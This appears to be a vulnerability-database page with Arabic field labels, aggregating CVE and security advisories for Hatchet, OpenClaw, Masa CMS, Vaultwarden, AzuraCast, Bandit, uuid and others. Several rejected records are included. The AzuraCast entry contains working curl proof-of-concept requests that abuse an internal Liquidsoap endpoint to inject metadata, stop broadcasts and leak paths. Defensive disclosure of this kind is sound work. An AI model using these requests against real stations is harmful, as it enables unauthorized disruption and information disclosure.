الوصف الكامل
## Summary A missing authorization directive on the `GET /api/v1/stable/dags/tasks` endpoint caused Hatchet's tenant-membership check to be skipped for this route. A user authenticated to any tenant on the same Hatchet instance could query the endpoint with another tenant's UUID and a DAG UUID belonging to that tenant, and receive task metadata for that DAG. This issue has been patched in **v0.83.39**. Hatchet Cloud has been patched and requires no action from users. Self-hosted users should upgrade. ## Impact **Who is affected.** Multi-tenant Hatchet instances reachable by an attacker who can obtain an account on that instance. On Hatchet Cloud, account creation is open by default. On self-hosted instances, the API must be reachable by the attacker and the hostname known; instances deployed inside a VPC or with signup restricted are not exposed to arbitrary external actors. **Prerequisites for exploitation.** An attacker needed: 1. An account on the target Hatchet instance. 2. The victim tenant's UUID. 3. At least one DAG UUID (`external_id`) belonging to that tenant. The two UUIDs are not treated as secrets — they appear in URLs, API responses, audit logs, invitation flows, shared run links, and dashboard screenshots — but an attacker does need to learn them through some out-of-band channel before exploitation is possible. **What could be disclosed.** For each child task of a targeted DAG, the endpoint returned: - `display_name`, `action_id`, `step_id` - `workflow_id`, `workflow_version_id`, `workflow_run_id`, `task_external_id` - `tenant_id`, `retry_count`, `status`, timestamps - `additional_metadata` (JSON) The `additional_metadata` field is the most sensitive: Hatchet workflows commonly use it to carry domain context such as user identifiers, customer IDs, feature flags, or correlation tokens. Its contents vary by deployment. **What was not disclosed.** The raw task `input` payload is not part of this endpoint's response shape and was not exposed through this issue. The scope is limited to task metadata, not task arguments or results. **Exploitation status.** We have no evidence that this vulnerability was exploited prior to the patch. ## Root cause Hatchet's multi-tenant authorization relies on an OpenAPI-driven middleware pipeline. Each authenticated operation declares `x-resources: ["tenant", ...]` in its spec. The `populator` middleware reads the declared resources, looks up the corresponding entities from request parameters, and stores them on the request context. The `authz` middleware then verifies that the authenticated user is a member of the tenant found on the context. The `listTasksByDAGIds` operation accepted a `tenant` UUID as a query parameter, but its OpenAPI definition did not declare `x-resources: ["tenant"]`. As a result: 1. The populator, which early-returns when no resources are declared, did not populate the tenant onto the request context. 2. The authz middleware, which runs its membership check only when a tenant is present on the context, silently passed the request through. 3. The handler read the tenant UUID directly from the query parameter and used it as the filter in the downstream OLAP query. The SQL query itself correctly filters by `tenant_id`, so it returned only rows matching the supplied UUID — but the UUID came from the caller rather than from an authorization-validated context, so the filter bounded the response to the *attacker-named* tenant rather than to a tenant the caller was authorized to read. Every other authenticated operation in the same path file (`tasks.yaml`) correctly declared `x-resources`. This endpoint was the only authenticated operation in the file that did not. ## Patch The fix adds the missing resource authz checks inline on the handler, enforcing valid tenant membership before the handler runs. Shipped in **v0.83.39**. ## Remediation **Hatchet Cloud.** No action required. The patch was deployed on April 23, 2026 within the same day it was reported. **Self-hosted — recommended.** Upgrade to **v0.83.39** or later. **Self-hosted — if you cannot upgrade immediately.** Either of the following reduces exposure until you can upgrade: - Restrict account creation by setting `SERVER_AUTH_RESTRICTED_EMAIL_DOMAINS` to an allowlist of domains you control. This prevents arbitrary users from registering an account on your instance, which removes the most common path to the prerequisite account. - Ensure the Hatchet API is not exposed to untrusted networks. We generally recommend running Hatchet inside a VPC and fronting the API with authenticated network controls; deployments configured this way were not reachable by arbitrary external attackers. ## Timeline All times April 23, 2026. - **14:05** — Reported to Hatchet. - **16:28** — Patch deployed to Hatchet Cloud and released as v0.83.39. - Public disclosure — this advisory. ## Credit Reported by @sajdakabir. Hatchet thanks the reporter for responsibly disclosing this issue and for the clear, reproducible writeup.
الإصدارات المتأثرة
All versions < 0.83.39
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N
الوصف الكامل
OpenClaw before 2026.4.20 contains a server-side request forgery vulnerability in QQBot direct media upload that skips URL validation. Attackers can bypass SSRF protections by sending crafted image URLs to uploadC2CMedia and uploadGroupMedia endpoints to relay unintended requests.
الإصدارات المتأثرة
2026.4.20
نوع الثغرة
CWE-918 — SSRF
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
الوصف الكامل
Masa CMS is an open source content management system. In versions 7.2.0 through 7.2.9, 7.3.0 through 7.3.14, 7.4.0 through 7.4.9, and 7.5.0 through 7.5.2, a SQL injection vulnerability exists in the beanFeed.cfc component within the getQuery function's handling of the sortDirection parameter. The parameter value is concatenated directly into SQL queries without sanitization or parameterization. An unauthenticated remote attacker can exploit this to extract sensitive information, modify or delete database records, or potentially achieve remote code execution on the underlying database server. This issue has been fixed in versions 7.2.10, 7.3.15, 7.4.10, and 7.5.3. As a workaround, use a WAF to block or restrict access to the beanFeed.cfc component, or deploy rules to detect SQL injection patterns targeting the sortDirection parameter.
نوع الثغرة
CWE-89 — SQL Injection
CVSS Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
الوصف الكامل
Masa CMS is an open source content management system. In versions 7.5.2 and earlier, a SQL injection vulnerability exists in the beanFeed.cfc component within the getQuery function's processing of the sortBy parameter. The application fails to properly sanitize or parameterize this input before incorporating it into dynamic SQL statements. An unauthenticated remote attacker can execute arbitrary SQL commands against the database, potentially gaining access to sensitive data, modifying or deleting records, or escalating privileges to administrative control. This issue has been fixed in versions 7.2.10, 7.3.15, 7.4.10, and 7.5.3. As a workaround, configure WAF rules to block malicious SQL patterns in the sortBy parameter sent to beanFeed.cfc.
نوع الثغرة
CWE-89 — SQL Injection
CVSS Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
الوصف الكامل
Vaultwarden is a Bitwarden-compatible server written in Rust. In version 1.35.4 and earlier, the get_org_collections_details endpoint (GET /api/organizations/{org_id}/collections/details) is missing the has_full_access() authorization check that exists on the sibling get_org_collections endpoint. This allows any Manager-role user with accessAll=False and no collection assignments to retrieve the names, UUIDs, user-to-collection mappings, and group-to-collection mappings for all collections in the organization. This issue has been fixed in version 1.35.5.
الإصدارات المتأثرة
1.35.5
نوع الثغرة
CWE-862 — Missing Authorization
CVSS Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
الوصف الكامل
In Eclipse Open9J versions 0.21 to 0.58, a pre-authentication remote attacker can crash JITServer by sending a 32-byte crafted TCP message.
الإصدارات المتأثرة
All versions < 0.59.0
نوع الثغرة
CWE-125 — Out-of-bounds Read
CVSS Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
الوصف الكامل
## Summary Heartbeat owner downgrade missed untrusted webhook wake events. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `>= 2026.4.7 < 2026.4.14` - Patched versions: `>= 2026.4.14` ## Impact Heartbeat owner downgrade logic could skip webhook wake events carrying untrusted content, preserving owner-like execution context where the run should have been downgraded. ## Technical Details The fix includes wake and hook event reasons in owner-downgrade inspection and forces downgrade for untrusted hook wake events. ## Fix The issue was fixed in #66031. The first stable tag containing the fix is `v2026.4.14`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `31281bc92f55796817a92bc43f722cba1e77ab42` - PR: #66031 ## Release Process Note Users should upgrade to `openclaw` 2026.4.14 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.
الإصدارات المتأثرة
2026.4.7 - 2026.4.14
نوع الثغرة
CWE-184 — CWE-184
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
الوصف الكامل
Eclipse Equinox OSGi 3.7.2 and earlier contains a remote code execution vulnerability that allows unauthenticated attackers to execute arbitrary commands by sending payloads to the console interface. Attackers can connect to the OSGi console port and send base64-encoded bash commands wrapped in fork directives to achieve code execution and establish reverse shell connections.
نوع الثغرة
CWE-306 — Auth Bypass
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
الوصف الكامل
Eclipse Equinox OSGi versions 3.8 through 3.18 contain a remote code execution vulnerability in the console interface that allows unauthenticated attackers to execute arbitrary code by exploiting the fork command functionality. Attackers can establish a telnet connection to the OSGi console, perform a telnet handshake, and send fork commands to download and execute malicious Java code, establishing a reverse shell connection.
نوع الثغرة
CWE-306 — Auth Bypass
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
الوصف الكامل
A vulnerability was identified in itsourcecode Courier Management System 1.0. This impacts an unknown function of the file /print_pdets.php. The manipulation of the argument ids leads to sql injection. The attack may be initiated remotely. The exploit is publicly available and might be used.
نوع الثغرة
CWE-74 — Injection
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
الوصف الكامل
## Summary The `/api/internal/{station_id}/liquidsoap/{action}` endpoint is accessible from the public web interface because it lacks the `RequireInternalConnection` middleware that protects other internal endpoints (`/sftp-auth`, `/sftp-event`). Combined with a logic flaw where the `$asAutoDj` flag is set based on the *presence* of the `X-Liquidsoap-Api-Key` header rather than its *validated value*, any user with the basic `View` station permission can invoke privileged Liquidsoap commands — injecting arbitrary now-playing metadata visible to all listeners, disrupting live broadcast tracking, and disclosing absolute filesystem paths. ## Details **Issue 1: Missing RequireInternalConnection middleware** In `backend/config/routes/api_internal.php`, the liquidsoap route group (lines 17-21) lacks the `RequireInternalConnection` middleware: ```php // Lines 17-21 — NO RequireInternalConnection $group->map( ['GET', 'POST'], '/liquidsoap/{action}', Controller\Api\Internal\LiquidsoapAction::class )->setName('api:internal:liquidsoap'); ``` Compare with sftp endpoints that correctly apply it: ```php // Lines 32-34 — HAS RequireInternalConnection $group->post('/sftp-auth', Controller\Api\Internal\SftpAuthAction::class) ->setName('api:internal:sftp-auth') ->add(Middleware\RequireInternalConnection::class); ``` The nginx config (`util/docker/web/nginx/azuracast.conf.tmpl`) only sets the `IS_INTERNAL` FastCGI parameter on the internal port 6010 listener (line 44), not on the public-facing server block (ports 80/443). Without the middleware, the endpoint is fully accessible from the public internet. **Issue 2: `$asAutoDj` derived from header presence, not validated value** In `backend/src/Controller/Api/Internal/LiquidsoapAction.php`: ```php // Line 34 — checks header PRESENCE, not value $asAutoDj = $request->hasHeader('X-Liquidsoap-Api-Key'); // Lines 38-44 — key value only checked when ACL FAILS $acl = $request->getAcl(); if (!$acl->isAllowed(StationPermissions::View, $station->id)) { $authKey = $request->getHeaderLine('X-Liquidsoap-Api-Key'); if (!$station->validateAdapterApiKey($authKey)) { throw new RuntimeException('Invalid API key.'); } } ``` When a user authenticates via session/API key and has `StationPermissions::View`, the ACL check passes and the adapter API key is never validated. But `$asAutoDj` is already `true` from line 34 because the header is present (with any arbitrary value). **Affected commands:** - `FeedbackCommand` (`backend/src/Radio/Backend/Liquidsoap/Command/FeedbackCommand.php:36`): Guard `if (!$asAutoDj) return false;` bypassed — creates SongHistory records and forces NowPlaying cache updates - `DjOffCommand` (`backend/src/Radio/Backend/Liquidsoap/Command/DjOffCommand.php:24`): Guard bypassed — calls `$this->streamerRepo->onDisconnect($station)` which ends all active broadcasts and sets `$station->is_streamer_live = false` - `DjOnCommand` (`backend/src/Radio/Backend/Liquidsoap/Command/DjOnCommand.php:31`): Guard bypassed — calls `$this->streamerRepo->onConnect($station, $user)` with attacker-controlled username - `CopyCommand` (`backend/src/Radio/Backend/Liquidsoap/Command/CopyCommand.php:18`): No `$asAutoDj` guard at all — returns absolute filesystem paths via `$mediaFs->getLocalPath($uri)` ## PoC **Prerequisites:** A user account with `StationPermissions::View` on station ID 1 (the lowest station-level permission). Obtain a session cookie or API key for this user. **1. Inject arbitrary now-playing metadata (FeedbackCommand):** ```bash curl -X POST 'https://target/api/internal/1/liquidsoap/feedback' \ -H 'X-API-Key: <view-user-api-key>' \ -H 'X-Liquidsoap-Api-Key: anything' \ -H 'Content-Type: application/json' \ -d '{"artist": "INJECTED", "title": "Fake Song Title"}' ``` Expected: Should reject — user does not have the adapter API key. Actual: Returns `true`. The injected artist/title appears in `/api/nowplaying/1` for all listeners. **2. Disrupt live broadcast (DjOffCommand):** ```bash curl -X POST 'https://target/api/internal/1/liquidsoap/djoff' \ -H 'X-API-Key: <view-user-api-key>' \ -H 'X-Liquidsoap-Api-Key: anything' ``` Expected: Should reject. Actual: Returns `true`. All active broadcast records for the station are terminated (`timestampEnd` set), `is_streamer_live` set to `false`, and `current_streamer` cleared. **3. Disclose filesystem paths (CopyCommand):** ```bash curl -X POST 'https://target/api/internal/1/liquidsoap/cp' \ -H 'X-API-Key: <view-user-api-key>' \ -H 'Content-Type: application/json' \ -d '{"uri": "test.mp3"}' ``` Expected: Should reject — this is an internal-only endpoint. Actual: Returns `{"uri":"/var/azuracast/stations/1/media/test.mp3","isTemp":false}` — disclosing the absolute filesystem path of the station's media storage. ## Impact Any user with the basic `StationPermissions::View` permission (the lowest station-level role, commonly assigned to DJs and collaborators) can: 1. **Inject arbitrary now-playing metadata** visible to all listeners via the public NowPlaying API and any connected players/widgets. This poisons the song history database and triggers cache updates that propagate the false data to all consumers. 2. **Disrupt live broadcasts** by terminating all active broadcast records and marking the station as having no live streamer, even when a DJ is actively broadcasting. This affects broadcast recording and live-DJ tracking. 3. **Fake DJ connections** with arbitrary usernames via the `djon` command, polluting streamer logs and potentially interfering with DJ scheduling. 4. **Disclose absolute filesystem paths** of the station's media storage directory via the `cp` command (no `$asAutoDj` guard required), which aids further attacks against the server. ## Recommended Fix **Fix 1: Add `RequireInternalConnection` middleware to the liquidsoap route group.** In `backend/config/routes/api_internal.php`, add the middleware to the station group: ```php $group->group( '/{station_id}', function (RouteCollectorProxy $group) { $group->map( ['GET', 'POST'], '/liquidsoap/{action}', Controller\Api\Internal\LiquidsoapAction::class )->setName('api:internal:liquidsoap') + ->add(Middleware\RequireInternalConnection::class); // Icecast internal auth functions $group->map( ['GET', 'POST'], '/listener-auth[/{api_auth}]', Controller\Api\Internal\ListenerAuthAction::class )->setName('api:internal:listener-auth'); } )->add(Middleware\GetStation::class); ``` **Fix 2: Validate the API key value before setting `$asAutoDj`.** In `backend/src/Controller/Api/Internal/LiquidsoapAction.php`, move `$asAutoDj` assignment after key validation: ```php - $asAutoDj = $request->hasHeader('X-Liquidsoap-Api-Key'); + $asAutoDj = false; try { $acl = $request->getAcl(); if (!$acl->isAllowed(StationPermissions::View, $station->id)) { $authKey = $request->getHeaderLine('X-Liquidsoap-Api-Key'); if (!$station->validateAdapterApiKey($authKey)) { throw new RuntimeException('Invalid API key.'); } + $asAutoDj = true; + } else { + // Even ACL-authenticated users must provide valid adapter key for AutoDJ operations + $authKey = $request->getHeaderLine('X-Liquidsoap-Api-Key'); + $asAutoDj = !empty($authKey) && $station->validateAdapterApiKey($authKey); } ``` Both fixes should be applied. Fix 1 is the primary defense (defense in depth — this endpoint should never be publicly accessible). Fix 2 corrects the logic flaw so that `$asAutoDj` is only `true` when the adapter API key is actually valid, regardless of how authentication was performed.
الإصدارات المتأثرة
All versions < 0.10.0, 0.10.1, 0.10.2, 0.10.3, 0.10.4
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
الوصف الكامل
Rejected reason: DO NOT USE THIS CVE RECORD. ConsultIDs: CVE-2026-6074. Reason: This record is a reservation duplicate of CVE-2026-6074. Notes: All CVE users should reference CVE-2026-6074 instead of this record. All references and descriptions in this record have been removed to prevent accidental usage.
المراجع
الوصف الكامل
A flaw has been found in Acrel Electrical ECEMS Enterprise Microgrid Energy Efficiency Management System 1.3.0. The impacted element is an unknown function of the file /SubstationWEBV2/main/elecMaxMinAvgValue. Executing a manipulation of the argument fCircuitids can lead to sql injection. The attack can be launched remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
نوع الثغرة
CWE-74 — Injection
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
الوصف الكامل
Reliance on Untrusted Inputs in a Security Decision vulnerability in mtrudel bandit allows unauthenticated transport-state spoofing on plaintext HTTP connections. 'Elixir.Bandit.Pipeline':determine_scheme/2 in lib/bandit/pipeline.ex returns the client-supplied URI scheme verbatim, ignoring the transport's secure? flag. HTTP/1.1 absolute-form request targets (e.g. GET https://victim/path HTTP/1.1) and the HTTP/2 :scheme pseudo-header are both attacker-controlled strings that flow through this function. Over a plaintext TCP connection, a client can declare https and Bandit will set conn.scheme = :https even though no TLS was negotiated. Downstream Plug consumers that branch on conn.scheme are silently misled: Plug.SSL's already-secure branch skips its HTTP→HTTPS redirect, cookies emitted with secure: true are sent over plaintext, audit logs record requests as having arrived over HTTPS, and CSRF/SameSite gating may make incorrect decisions. This issue affects bandit: from 1.0.0 before 1.11.0.
نوع الثغرة
CWE-807 — CWE-807
CVSS Vector
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
الوصف الكامل
Rejected reason: ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2025-67968. Reason: This candidate is a reservation duplicate of CVE-2025-67968. Notes: All CVE users should reference CVE-2025-67968 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage.
المراجع
الوصف الكامل
Rejected reason: ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2026-2052. Reason: This candidate is a reservation duplicate of CVE-2026-2052 Notes: All CVE users should reference CVE-2026-2052 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage.
المراجع
الوصف الكامل
Rejected reason: DO NOT USE THIS CVE RECORD. ConsultIDs: none. Reason: This record was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.
المراجع
الوصف الكامل
Rejected reason: DO NOT USE THIS CVE RECORD. ConsultIDs: none. Reason: This record was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.
المراجع
الوصف الكامل
Rejected reason: DO NOT USE THIS CVE RECORD. ConsultIDs: none. Reason: This record was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.
المراجع
الوصف الكامل
Rejected reason: DO NOT USE THIS CVE RECORD. ConsultIDs: none. Reason: This record was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.
المراجع
الوصف الكامل
Rejected reason: DO NOT USE THIS CVE RECORD. ConsultIDs: none. Reason: This record was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.
المراجع
الوصف الكامل
Rejected reason: DO NOT USE THIS CVE RECORD. ConsultIDs: none. Reason: This record was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.
المراجع
الوصف الكامل
Rejected reason: DO NOT USE THIS CVE RECORD. ConsultIDs: none. Reason: This record was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.
المراجع
الوصف الكامل
Rejected reason: DO NOT USE THIS CVE RECORD. ConsultIDs: none. Reason: This record was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.
المراجع
الوصف الكامل
Rejected reason: ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2025-12494. Reason: This candidate is a reservation duplicate of CVE-2025-12494. Notes: All CVE users should reference CVE-2025-12494 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage.
المراجع
الوصف الكامل
Insufficient validation of node IDs in Qt SVG module allows arbitrary QML/JavaScript code injection when loading malicious SVG files through the VectorImage component in Qt Quick. While QML execution is typically more restricted than native code execution, this could still lead to denial of service, information disclosure, or other impacts depending on the application's privilege level and data access.
الإصدارات المتأثرة
6.8.0 - 6.8.6
نوع الثغرة
CWE-20 — Input Validation
CVSS Vector
CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
الوصف الكامل
Dancer::Session::Abstract versions through 1.3522 for Perl generates session ids insecurely. The session id is generated from summing the character codepoints of the absolute pathname with the process id, the epoch time and calls to the built-in rand() function to return a number between 0 and 999-billion, and concatenating that result three times. The path name might be known or guessed by an attacker, especially for applications known to be written using Dancer with standard installation locations. The epoch time can be guessed by an attacker, and may be leaked in the HTTP header. The process id comes from a small set of numbers, and workers may have sequential process ids. The built-in rand() function is seeded with 32-bits and is considered unsuitable for security applications. Predictable session ids could allow an attacker to gain access to systems.
الإصدارات المتأثرة
1.3522
نوع الثغرة
CWE-338 — CWE-338
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
الوصف الكامل
Insufficient packet validation in FreeRTOS-Plus-TCP before V4.2.6 and V4.4.1 allows an adjacent network actor to bypass all checksum and minimum-size validation by spoofing the Ethernet source MAC address to match one of the device's own registered endpoints, because the loopback detection mechanism skips all input validation for packets whose source MAC matches a local endpoint. To mitigate this issue, users should upgrade to the fixed version when available.
الإصدارات المتأثرة
4.0.0 - 4.2.6
نوع الثغرة
CWE-290 — CWE-290
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
الوصف الكامل
A flaw has been found in fatbobman mail-mcp-bridge up to 1.3.3. Affected is an unknown function of the file src/mail_mcp_server.py. Executing a manipulation of the argument message_ids can lead to path traversal. The attack can be executed remotely. The exploit has been published and may be used. Upgrading to version 1.3.4 is able to address this issue. This patch is called 638b162b26532e32fa8d8047f638537dbdfe197a. Upgrading the affected component is recommended.
نوع الثغرة
CWE-22 — Path Traversal
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
المراجع
https://github.com/fatbobman/mail-mcp-bridge/commit/638b162b26532e32fa8d8047f638537dbdfe197a
https://github.com/fatbobman/mail-mcp-bridge/issues/2
https://github.com/fatbobman/mail-mcp-bridge/releases/tag/1.3.4
https://vuldb.com/submit/803096
https://vuldb.com/vuln/360107
https://vuldb.com/vuln/360107/cti
الوصف الكامل
A vulnerability was determined in Artifex MuPDF up to 1.28.0. The impacted element is the function fz_subset_cff_for_gids of the file subset-cff.c of the component CFF Index Handler. This manipulation causes out-of-bounds read. The attack can only be executed locally. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through a bug report but has not responded yet.
الإصدارات المتأثرة
1.27.2
نوع الثغرة
CWE-119 — Buffer Overflow
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
الوصف الكامل
Document structural anomalies caused inconsistencies between page element relationships and internal index states. When scripts triggered document modifications, object reference validity was not properly maintained, leading to a crash when accessing an invalid pointer during page information queries.
الإصدارات المتأثرة
13.2.4
نوع الثغرة
CWE-416 — Use After Free
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
الوصف الكامل
A vulnerability was detected in Tenda F456 1.0.0.5. Affected is the function fromGstDhcpSetSer of the file /goform/GstDhcpSetSer of the component httpd. Performing a manipulation of the argument dips results in buffer overflow. Remote exploitation of the attack is possible. The exploit is now public and may be used.
نوع الثغرة
CWE-119 — Buffer Overflow
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
الوصف الكامل
### Summary `v3`, `v5`, and `v6` accept external output buffers but do not reject out-of-range writes (small `buf` or large `offset`). By contrast, `v4`, `v1`, and `v7` explicitly throw `RangeError` on invalid bounds. This inconsistency allows **silent partial writes** into caller-provided buffers. ### Affected code - `src/v35.ts` (`v3`/`v5` path) writes `buf[offset + i]` without bounds validation. - `src/v6.ts` writes `buf[offset + i]` without bounds validation. ### Reproducible PoC ```bash cd /home/StrawHat/uuid npm ci npm run build node --input-type=module -e " import {v4,v5,v6} from './dist-node/index.js'; const ns='6ba7b810-9dad-11d1-80b4-00c04fd430c8'; for (const [name,fn] of [ ['v4',()=>v4({},new Uint8Array(8),4)], ['v5',()=>v5('x',ns,new Uint8Array(8),4)], ['v6',()=>v6({},new Uint8Array(8),4)], ]) { try { fn(); console.log(name,'NO_THROW'); } catch(e){ console.log(name,'THREW',e.name); } }" ``` Observed: - `v4 THREW RangeError` - `v5 NO_THROW` - `v6 NO_THROW` Example partial overwrite evidence captured during audit: ```text same true buf [ 170, 170, 170, 170, 75, 224, 100, 63 ] v6 [ 187, 187, 187, 187, 31, 19, 185, 64 ] ``` ### Security impact - **Primary**: integrity/robustness issue (silent partial output). - If an application assumes full UUID writes into preallocated buffers, this can produce malformed/truncated/partially stale identifiers without error. - In systems where caller-controlled offsets/buffer sizes are exposed indirectly, this may become a security-relevant logic flaw. ### Suggested fix Add the same guard used by `v4`/`v1`/`v7`: ```ts if (offset < 0 || offset + 16 > buf.length) { throw new RangeError(`UUID byte range ${offset}:${offset + 15} is out of buffer bounds`); } ``` Apply to: - `src/v35.ts` (covers `v3` and `v5`) - `src/v6.ts`
الإصدارات المتأثرة
11.0.0 - 11.1.1
نوع الثغرة
CWE-787 — Out-of-bounds Write
CVSS Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
الوصف الكامل
## Summary Device-Paired Node Skips Node Scope Gate → Host RCE.md ## Current Maintainer Triage - Status: open - Normalized severity: high - Assessment: Real in shipped v2026.3.28 because a merely device-paired node could expose node commands without node pairing, but high is sufficient given the pairing/setup prerequisites. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `3886b65ef21d02808c1a106fa1f9f69e22f71c32` — 2026-03-30T17:29:28+01:00 OpenClaw thanks @AntAISecurityLab for reporting.
الإصدارات المتأثرة
2026.3.31
نوع الثغرة
CWE-862 — Missing Authorization
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
الوصف الكامل
OpenClaw before 2026.3.31 contains a decompression bomb vulnerability in image processing that fails to properly enforce pixel-limit guards on sips. Attackers can exploit this by uploading oversized images to cause denial of service through excessive memory consumption.
الإصدارات المتأثرة
2026.3.31
نوع الثغرة
CWE-636 — CWE-636
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
الوصف الكامل
OpenLearn is open-source educational forum software. Prior to commit 844b2a40a69d0c4911580fe501923f0b391313ab, when `safeMode` is enabled, unapproved forum posts are hidden from the public list, but the direct post-read procedure still returns the full post to anyone with the post UUID. Commit 844b2a40a69d0c4911580fe501923f0b391313ab fixes the issue.
الإصدارات المتأثرة
2026-04-14
نوع الثغرة
CWE-284 — CWE-284
CVSS Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
الوصف الكامل
The printenv utility in uutils coreutils fails to display environment variables containing invalid UTF-8 byte sequences. While POSIX permits arbitrary bytes in environment strings, the uutils implementation silently skips these entries rather than printing the raw bytes. This vulnerability allows malicious environment variables (e.g., adversarial LD_PRELOAD values) to evade inspection by administrators or security auditing tools, potentially allowing library injection or other environment-based attacks to go undetected.
نوع الثغرة
CWE-754 — CWE-754
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
الوصف الكامل
